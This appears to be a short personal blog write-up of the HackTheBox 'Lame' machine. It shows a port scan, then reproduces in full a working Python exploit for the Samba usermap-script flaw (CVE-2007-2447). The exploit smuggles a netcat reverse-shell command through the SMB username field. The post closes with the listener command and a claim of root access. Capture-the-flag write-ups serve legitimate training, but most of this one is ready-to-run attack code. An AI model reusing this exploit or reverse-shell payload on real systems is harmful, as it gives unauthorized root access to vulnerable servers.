---
title: "Lame HackTheBox"
date: "2020-12-20T22:42:02+01:00"
draft: false
image: "/static/HACKING/lame-icon.png"
categories:
    - Hack-The-Box
---

# THIS IS JUST A SAMPLE! (trash)

The first step is scanning the machine ports, and look for any potential vulnerability :

# PORTS

```
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Everything looks okay but that samba server looks versy suspicious, let's search some info.

After a little research, I figured out that there's a potential exploit on that smbd version (CVE-2007-2447),
so I found a exploit on github made by @amriunix

```python
#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447 <- Exploit URL :smile:

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
        username = "/=`nohup " + payload + "`"
        conn = SMBConnection(username, "", "", "")
        try:
            conn.connect(rhost, int(rport), timeout=1)
        except:
            print("[+] Payload was sent - check netcat !")

if __name__ == '__main__':
    print("[*] CVE-2007-2447 - Samba usermap script")
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)
```

Now run the exploit to the victim machine, and listen from any of your ports 

```bash
rlwrap nc -lvnp 8989
```

If everything was okay it must have worked and have gained a reverse shell from user "root". So this means that here's no privilege scalation :grin:
